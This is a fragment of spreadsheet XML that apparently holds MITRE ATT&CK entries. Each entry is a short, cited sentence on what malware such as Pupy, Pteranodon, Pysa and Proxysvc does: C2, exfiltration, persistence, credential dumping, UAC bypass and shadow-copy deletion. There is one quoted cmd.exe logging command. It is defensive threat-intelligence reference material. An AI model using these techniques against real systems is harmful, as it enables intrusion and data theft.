    <t>relationship--5408c62f-55e0-4480-8449-ec3c191b66b8</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses macOS' .command file type to script actions.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--ee998ebb-2960-45db-bced-7c8081dfc030</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses VNC to connect into systems.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--440c7f08-e570-4536-8f9c-849952581de1</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) automatically collects data about the victim and sends it to the control server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--4ed42682-d3ad-4a4f-8576-ccdf28ce642b</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) can overwrite files indicated by the attacker before deleting them.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--f0c53ce3-a265-4da9-a553-c5f2faffa5b8</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) searches the local system and gathers data.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--066d9d0e-0298-420b-ba84-a4af07211a35</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) performs data exfiltration over the control server channel using a custom protocol.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--c621754d-39c0-4ed4-96d2-6f47e8263aea</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) can delete files indicated by the attacker and remove itself from disk using a batch file.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--3cf1b188-99ad-48a5-bce8-962eef956ec8</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) lists files in directories.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--77270a5a-c2e7-4cf0-8d73-129758454bcc</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) lists processes running on the system.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--c407e138-4e68-46e9-b41d-4447a282a1fd</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</si>
  <si>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</si>
  <si>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relationship--c8bf1e63-1275-46c7-b378-b4a3cc3eb369</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) registers itself as a service on the victim’s machine to run as a standalone process.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--5d6984fc-52cb-429b-9e68-64e656d9ad30</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--960bdedf-dcca-4a9b-aa12-358324565470</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) collects the network adapter information and domain/username information based on current remote sessions.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--d4d12441-c588-47f2-9751-8a86a867a185</t>
  </si>
  <si>
    <t>As part of the data reconnaissance phase, [Proxysvc](https://attack.mitre.org/software/S0238) grabs the system time to send back to the control server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--d8427910-3c8f-4633-966f-e1a2a8d7c31c</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) uses HTTP over SSL to communicate commands with the control server.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--1be07482-c5ed-42f9-8be1-5dbb44152461</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) executes a binary on the system and logs the results into a temp file by using: &lt;code&gt;cmd.exe /c "&lt;file_path&gt; &gt; %temp%\PM* .tmp 2&gt;&amp;1"&lt;/code&gt;.(Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>relationship--deae71f8-d849-484f-b49d-757356e195c5</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029) has the ability to remotely create accounts on target systems.(Citation: NCC Group Fivehands June 2021)</t>
  </si>
  <si>
    <t>relationship--bbdea723-700c-409e-8992-e15c4bd16654</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029) can be used to download or upload a file over a network share.(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>relationship--9f5c68fe-a32e-405d-ae58-0965f04855cb</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029), a tool that has been used by adversaries, writes programs to the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>relationship--27102940-8ec1-42ad-98e5-57dc24b572eb</t>
  </si>
  <si>
    <t>Microsoft Sysinternals [PsExec](https://attack.mitre.org/software/S0029) is a popular administration tool that can be used to execute binaries on remote systems using a temporary Windows service.(Citation: Russinovich Sysinternals)</t>
  </si>
  <si>
    <t>relationship--a66aff09-0635-44a3-b591-a530a25c9012</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029) can leverage Windows services to escalate privileges from administrator to SYSTEM with the &lt;code&gt;-s&lt;/code&gt; argument.(Citation: Russinovich Sysinternals)</t>
  </si>
  <si>
    <t>relationship--43b00ad2-2d54-4ca9-a0a2-a0cb1a5fa7ff</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--ac3b6751-e615-44f6-a086-0c236742d8fd</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) has commands to enumerate all storage devices and to find all files that start with a particular string.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--922c214d-ad32-4490-bb3f-a4db73b718d5</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) has a command to download a file to the system from its C2 server.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--a1e74408-5c7b-4538-afd9-a01b23a92429</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) has a command to conduct timestomping by setting a specified file’s timestamps to match those of a system file in the System32 directory.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--d8a7ec97-b262-489d-bc4b-e2c7007f75bc</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) uses HTTPS for C2.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--58f6b7ce-c0d0-4a54-b60d-1c39d6204796</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can decrypt encrypted data strings prior to using them.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--7ce7aa48-afa9-4eb6-8bc2-8f04fd6cf00e</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can use a dynamic Windows hashing algorithm to map API components.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--975d47f9-976e-438a-bd18-2e7e0125aa44</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) exfiltrates screenshot files to its C2 server.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>relationship--acc40539-13a0-4577-a862-e348962bf0fc</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>relationship--c8bceb4a-0cf2-43c9-9729-20ed706c4c72</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) identifies files matching certain file extension and copies them to subdirectories it created.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>relationship--5d46a519-1ef9-4cdb-b737-8c7b3ffb4f0e</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can download and execute additional files.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: Symantec Shuckworm January 2022)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>relationship--35ae6625-8563-493c-8950-1230bd0fd122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</si>
  <si>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</si>
  <si>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relationship--c93bb2b9-bd22-4e14-b884-2141168387b2</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can use mshta.exe to execute an HTA file hosted on a remote server.(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>relationship--d4e67bb3-dcb2-4427-a48e-d8b4bcc35afa</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) has used various API calls.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--20acec2a-ce61-4794-82f9-79fa778e7a7f</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) copies itself to the Startup folder to establish persistence.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>relationship--44908b0a-993a-4339-b30f-f0f1a64c0753</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) executes functions using rundll32.exe.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>relationship--a20b8e4c-330f-4e91-b4f6-e58e5800d690</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) schedules tasks to invoke its components in order to establish persistence.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>relationship--dbacc7d5-5d10-4b41-994d-51e0792cfb19</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can capture screenshots at a configurable interval.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>relationship--0471088d-7b45-4fec-8946-ae5bf463286b</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) has the ability to use anti-detection functions to identify sandbox environments.(Citation: Unit 42 Gamaredon February 2022)</t>
  </si>
  <si>
    <t>relationship--c9a7b01c-5ba6-41db-944a-ed5ba8531398</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can use a malicious VBS file for execution.(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>relationship--97b13d6e-ad8d-42db-90cf-90c7189763cb</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can use HTTP for C2.(Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>relationship--50f39180-6e5a-476b-b18f-d4e09e83c9d9</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) can use `cmd.exe` for execution on victim systems.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: Symantec Shuckworm January 2022)</t>
  </si>
  <si>
    <t>relationship--16632790-94dc-40ce-9c0a-2f6af0f691b1</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can compress data with Zip before sending it over C2.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--d1ee6feb-91cb-4cac-ae57-e71358af29c2</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192)'s default encryption for its C2 communication channel is SSL, but it also has transport options for RSA and AES.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--2d90749b-525e-4aa2-9df0-1d5677be0b25</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can record sound with the microphone.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--49f3c807-a801-4cfe-ad1c-6966bea2fc8a</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--321a3181-9478-4a4c-b13b-607dbfeee7fc</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can use Lazagne for harvesting credentials.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--d8707d98-c6f1-4d16-956a-df9a6862b7fa</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a module to clear event logs with PowerShell.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--c84e0640-82fe-4bb7-b0e1-99b6a746970c</t>
  </si>
  <si>
    <t>relationship--09c0536a-863f-4561-ad59-a5fa1c8daaa1</t>
  </si>
  <si>
    <t>relationship--eb46f5b9-ff45-4229-b24a-7344829f0884</t>
  </si>
  <si>
    <t>relationship--4889f7a3-2c36-423a-b48d-c5405e07442f</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can user PowerView to execute “net user” commands and create domain accounts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--3aab83a8-eeda-4fdd-a103-d7f1e8d02989</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can migrate into another process using reflective DLL injection.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--4a0cbe7f-e88c-4ef6-8bf7-9f6e17e8de04</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can send screenshots files, keylogger data, files, and recorded audio back to the C2 server.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--3abe734c-7fd2-4da6-9b0a-420f9187165c</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can walk through directories and recursively search for strings in files.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--75d124da-bb01-422f-bbf1-a472c841741b</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can upload and download to/from a victim machine.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--151dd9ac-7e33-4580-a4a4-09f71fa73f51</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) uses a keylogger to capture keystrokes it then sends back to the server after it is stopped.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--811d0ef6-047f-4813-801e-33ebf1cae22a</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can sniff plaintext network credentials and use NBNS Spoofing to poison name services.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--a9bbbd0f-3f45-4efa-9e6b-56ed2c9b9126</t>
  </si>
  <si>
    <t>relationship--e8a51a09-79b4-44d8-8f25-eb8c7c230da5</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can execute Lazagne as well as [Mimikatz](https://attack.mitre.org/software/S0002) using PowerShell.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--7ebe873c-07f5-43a7-a59f-9305f9ec55a5</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) uses PowerView and Pywerview to perform discovery commands such as net user, net group, net local group, etc.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--bdb0d192-3d82-4e5b-92bc-7ef24fd3e65b</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can user PowerView to execute “net user” commands and create local system accounts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--6c7965c9-6ea5-4693-889d-25c1c47b2698</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can interact with a victim’s Outlook session and look through folders and emails.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--5c736aad-9847-4059-9d1e-dc2f551952d0</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a built-in module for port scanning.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--01a1c2f4-ccb3-4238-9c9c-d6ca3a098ed9</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can list local and remote shared drives and folders over SMB.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--1ba0b437-e809-479c-a254-172e706c3615</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can also perform pass-the-ticket.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--9f6c0951-1a78-4738-81ec-a11325a15352</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a module for loading and executing PowerShell scripts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--328636ab-7265-4212-96d4-4ebf2e6a65db</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can list the running processes and get the process ID and parent process’s ID.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--fa2a7222-e9b1-4e97-82da-42a9c4014bdd</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</si>
  <si>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</si>
  <si>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relationship--befbbf7a-6480-4825-b7f6-1561dc6d4189</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) adds itself to the startup folder or adds itself to the Registry key &lt;code&gt;SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run&lt;/code&gt; for persistence.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--d38177b0-03c0-4c59-afa6-eea94a372daa</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can enable/disable RDP connection and can start a remote desktop session using a browser web socket client.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--9c593e55-8c4d-4705-9e8b-ac83962973df</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can drop a mouse-logger that will take small screenshots around at each click and then send back to the server.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--09869965-8dcd-4c20-a997-c075b6ed0434</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) uses [PsExec](https://attack.mitre.org/software/S0029) to execute a payload or commands on a remote host.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--00822c6a-a881-4678-8d74-6a52b2ca27c9</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a module that checks a number of indicators on the system to determine if its running on a virtual machine.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--88587bdd-ea5a-4d80-af9f-cc900c5705e3</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can grab a system’s information including the OS version, architecture, etc.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--7e2a1dfa-1ccd-4700-a4a5-3b98590ae710</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has built in commands to identify a host’s IP address and find out other network configuration settings by viewing connected sessions.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--4d8fd7fc-eb0b-4031-8df0-ef3d237edb7c</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) has a built-in utility command for &lt;code&gt;netstat&lt;/code&gt;, can do net session through PowerView, and has an interactive shell which can be used to discover additional information.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--eb3a838e-f6dd-4e9b-8edf-fc652adde117</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can enumerate local information for Linux hosts and find currently logged on users for Windows hosts.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--39e6a7c0-5eb8-49fe-aec7-9ae9fe70723a</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can be used to establish persistence using a systemd service.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--69b71b4b-fec9-4850-b002-4a44b875a814</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--d17517a1-f941-46a0-bcb6-d2a5b94cb24b</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can access a connected webcam and capture pictures.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--c18f83e7-979e-4bd8-80bb-d0a4e8146a21</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can communicate over HTTP for C2.(Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>relationship--85112c0c-3096-4118-9ba6-ed173128544f</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) can use an XDG Autostart to establish persistence.(Citation: Red Canary Netwire Linux 2022)</t>
  </si>
  <si>
    <t>relationship--7203bf5f-4a67-48d9-92ac-f7b77795e1f0</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has decrypted and dropped the [DCSrv](https://attack.mitre.org/software/S1033) payload to disk.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--4e3a250d-c168-4544-82c5-3b1414be826d</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has modified firewall rules to allow incoming SMB, NetBIOS, and RPC connections using `netsh.exe` on remote machines.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--5e4a4b86-b2af-450b-b365-0a5399509462</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) will remove all created artifacts such as dropped executables.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--e4fca715-c0a5-4292-ac6f-ab79bdd4241b</t>
  </si>
  <si>
    <t xml:space="preserve">[PyDCrypt](https://attack.mitre.org/software/S1032) has dropped [DCSrv](https://attack.mitre.org/software/S1033) under the `svchost.exe` name to disk.(Citation: Checkpoint MosesStaff Nov 2021)
</t>
  </si>
  <si>
    <t>relationship--40b50ac5-b1c1-4f80-b350-460cc0ed9f9f</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has been compiled and encrypted with PyInstaller, specifically using the --key flag during the build phase.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--9fe48106-c6e9-4b1a-a274-b35166e082da</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has attempted to execute with PowerShell.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--b21c213b-9a73-4784-b123-a339d401b66e</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032), along with its functions, is written in Python.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--2dc7b1ac-48d5-48cc-9298-3e11b4658cb6</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has used [netsh](https://attack.mitre.org/software/S0108) to find RPC connections on remote machines.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--84ea2b0d-ca0f-425d-86c8-7df1ca514841</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has probed victim machines with &lt;code&gt;whoami&lt;/code&gt; and has collected the username from the machine.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--c5540ad5-b651-498f-abd4-fe521f1288f9</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has used `cmd.exe` for execution.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--377e62e1-6b80-46f5-8f0e-be236052c294</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) has attempted to execute with WMIC.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--b835f71a-b961-4d69-a7eb-6bf682f433de</t>
  </si>
  <si>
    <t>S0583</t>
  </si>
  <si>
    <t>Pysa</t>
  </si>
  <si>
    <t>malware--a19c1197-9414-46e3-986f-0f609ff4a46b</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has used brute force attempts against a central management console, as well as some Active Directory accounts.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>relationship--e9c00323-e4de-41ac-9051-55860ecfa8a0</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has extracted credentials from the password database before encrypting the files.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>relationship--4bfd7ff0-f4a9-48f4-b5fb-1483dc74e760</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has used RSA and AES-CBC encryption algorithm to encrypt a list of targeted file extensions.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>relationship--7893dc40-721b-4455-b411-3ccda7f4a3a2</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has the capability to stop antivirus services and disable Windows Defender.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>relationship--571dc63c-8073-4898-8434-94f8ce2e8d6d</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has deleted batch files after execution. (Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>relationship--fc0b1fb2-f987-4d9c-8470-c40c517925d9</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has the functionality to delete shadow copies.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>relationship--d6dcaa34-12d9-45f3-8f7b-397c2da0995a</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) can perform OS credential dumping using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>relationship--b408ac97-93d7-4cca-ac96-7a61ab99cb5e</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has executed a malicious executable by naming it svchost.exe.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>relationship--d77aa71a-e37f-4c8e-a4ad-b33a700afb7a</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has modified the registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” and added the ransom note.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>relationship--7a097ec6-c379-4aef-849e-fe7d9ea1e7d1</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) can perform network reconnaissance using the Advanced Port Scanner tool.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>relationship--fefae8e3-2549-4743-9713-7dfa40c52ae4</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has used Powershell scripts to deploy its ransomware.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>relationship--5db4c540-d95b-4a38-9d05-c21d7c85c9b1</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has used Python scripts to deploy ransomware.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>relationship--3cd8146a-8d50-4a36-8d8c-3c80e7b63105</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has laterally moved using RDP connections.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>relationship--8fd19779-990a-4ce7-9b59-173896e518e8</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has used [PsExec](https://attack.mitre.org/software/S0029) to copy and execute the ransomware.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>relationship--96417d00-2a6b-4a22-b43c-f65cb60da952</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) can stop services and processes.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>relationship--cdbbaa5b-c1d7-4e94-8a0e-a0be60ec377c</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) can perform network reconnaissance using the Advanced IP Scanner tool.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>relationship--15e5a285-2177-462f-bd40-bc68347efcaf</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) was likely obfuscated using `Invoke-Obfuscation`.(Citation: Unit 42 QUADAGENT July 2018)(Citation: GitHub Invoke-Obfuscation)</t>
  </si>
  <si>
    <t>relationship--7b5178ce-a9bc-405e-b062-22b4276fbf99</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses DNS for C2 communications.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--01292102-1f89-4358-b62c-bc0afd49fc52</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--198cddce-40f7-43eb-aeac-60171f111065</t>
  </si>
  <si>
